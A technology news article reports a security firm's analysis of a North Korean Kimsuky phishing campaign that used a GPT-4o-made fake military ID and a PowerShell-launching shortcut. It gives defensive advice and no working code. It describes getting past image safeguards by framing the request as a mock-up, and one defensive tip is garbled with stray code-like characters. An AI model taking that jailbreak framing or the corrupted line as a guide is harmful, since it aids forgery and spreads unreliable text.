FindArticles FindArticles
  • News
  • Technology
  • Business
  • Entertainment
  • Science & Health
  • Knowledge Base
FindArticlesFindArticles
Font ResizerAa
Search
  • News
  • Technology
  • Business
  • Entertainment
  • Science & Health
  • Knowledge Base
Follow US
  • Contact Us
  • About Us
  • Write For Us
  • Privacy Policy
  • Terms of Service
FindArticles © 2025. All Rights Reserved.
FindArticles > News > Technology

Kimsuky Phishers Employed ChatGPT to Craft ID Images

Bill Thompson
Last updated: October 29, 2025 11:45 am
By Bill Thompson
Technology
6 Min Read
SHARE

A North Korean threat actor known as Kimsuky leveraged OpenAI-powered image generation to reinforce a targeted phishing attack, in new analysis from security firm Genians.

The hackers had concocted a realistic image of a South Korean military ID to legitimize their lure, but they left behind telltale metadata referencing “GPT-4o*OpenAI API” and “ChatGPT,” investigators said. A computer algorithm designed to sniff out deepfakes labeled the ID photo as 98 percent likely to be artificial intelligence-created.

Table of Contents
  • How the Lure Worked
  • AI Fingerprints on the Fake ID
  • Why This Matters
  • Defensive Takeaways
  • A Wider Pattern of AI Abuse
The white OpenAI logo with GPT-4o text below it, set against a professional background with a subtle green -to-gray gradient and faint geometric patte

How the Lure Worked

The campaign impersonated a South Korean defense-related institution that provides identification to military-affiliated individuals, Genians says. The emails originated from a domain made to closely resemble that of the real organisation and had an attachment in ZIP format that contained the recipient’s name—corrupted for credibility.

A Windows shortcut disguised as documentation lurked inside the archive. If it was carried out, it launched a PowerShell command that connected the machine of an unsuspecting victim to a remote server, installed backdoor malware and then quietly retrieved an image of what appears to be a fake government ID as cover. The decoy was the story line itself — “this is routine ID processing” — while the intrusion played out behind.

AI Fingerprints on the Fake ID

Genians said the fake ID contained metadata showing it had been generated by OpenAI’s GPT-4o model, generating via API access.

While OpenAI’s systems prevent images of actual government IDs from being created, researchers theorize that the attackers may have skirted the restrictions by framing their request to mimic a harmless mock-up or template — an approach frequently referred to as a jailbreak.

This is not the first time state-backed hackers have crossed paths with the AI industry. OpenAI and Microsoft Threat Intelligence have previously observed and disrupted activity from multiple government-aligned groups, including North Korea’s Kimsuky (which Microsoft tracks as Emerald Sleet). The newest discoveries indicate that is still the case with such actors actively hunting for openings, especially in image tools that can create believable visual cover for social engineering.

Why This Matters

Phishing already heavily trades in trust cues — logos, signatures, familiar language. Factor in photo-realistic AI-generated images, and the skepticism bar gets considerably higher. For much of the world, it’s “close enough” when a sender glances at a badge or form and sees that someone is supposedly covered by this rule — particularly if the sender seems to know what name the someone goes by. It was that mixture of personalization and polished appearance that Kimsuky mined.

Explainer diagram showing the lure's step-by-step mechanism

The trend dovetails with other data on the effectiveness of social engineering. According to the new Verizon Data Breach Investigations Report, most breaches are a “result of the human element,” noting phishing and pretexting as two of the most popular forms of initial entry. Kimsuky’s background — charted by South Korea’s National Intelligence Service, Mandiant and other researchers — is in credential theft, espionage and recruitment fraud targeting defense, policy and research communities.

Defensive Takeaways

Harden the fundamentals where this campaign is living: aggressively filter or quarantine incoming ZIP and shortcut files from outside sources; insist that users access attachments through approved, scanned portals; and discourage (in any but the most conservative environments) the manual “copy-paste this command” action. Multifactor authentication, even if not perfect, goes a long way toward blunting the damage from credential theft that can result from a successful phish.

On endpoints, limit and log PowerShell (e.g. constrained language mode and script block logging), watch for weird child processes of shell shortcuts, apply strong egress controls to limit CNC transport.

1.deploy SPF,Dkim,Dmarc on the mail&”,$url5]1;}’) domain to reduce brand spoofing. And update training on awareness: a professional-looking ID photo is no proof of legitimacy in this age of generative AI — get verifications through official channels, not email attachments.

A Wider Pattern of AI Abuse

Across the industry, researchers from Google’s Threat Analysis Group, Recorded Future and Mandiant have followed North Korean operators as they practiced using deepfakes, fake recruiter personas and AI-written outreach to build trust or land remote roles within Western companies. The Kimsuky case layers on something new: AI-generated images not as the payload, but rather as a means of protecting the intrusion’s overwatch.

As generative models get better, defenders should expect more polished decoys: forged licenses, invoices or utility notices that pass casual scrutiny. The pragmatic approach is not to demonize AI, but to assume that adversaries will adopt it and elevate the standards for verification accordingly. If a message seems to be pushy, urging you to open an archive, run a command or take an ID at face value then stop — trust is something that has to be earned, not assumed based on a picture.

Bill Thompson
ByBill Thompson
Bill Thompson is a veteran technology columnist and digital culture analyst with decades of experience reporting on the intersection of media, society, and the internet. His commentary has been featured across major publications and global broadcasters. Known for exploring the social impact of digital transformation, Bill writes with a focus on ethics, innovation, and the future of information.
Latest News
Discord Adds Weekly Purchase Checking For Parents
Pinterest CEO Praises Open Source AI For Lower Costs
Blue Origin Aims for Second New Glenn Launch
MacBook Air Drops to Lowest-Ever Price While Supplies Last
Target Circle Offers Free $10 Gift Card With 3 Essentials
Bluetooth Options Fuel Retro Audio Comeback
Google Prepares One-Tap Theme Packs for Pixel Users
Practical solutions for Android ‘No SIM card’ errors
Kim Kardashian Claims ChatGPT Made Her Fail Law Exams
iPhone Voicemail Issues Reported: Try These Fixes
Exynos 2600 Leak Hints At Huge Galaxy S26 Camera Upgrade
The Chief Engineer of Lucid Leaves After a Decade
FindArticles
  • Contact Us
  • About Us
  • Write For Us
  • Privacy Policy
  • Terms of Service
  • Corrections Policy
  • Diversity & Inclusion Statement
  • Diversity in Our Team
  • Editorial Guidelines
  • Feedback & Editorial Contact Policy
FindArticles © 2025. All Rights Reserved.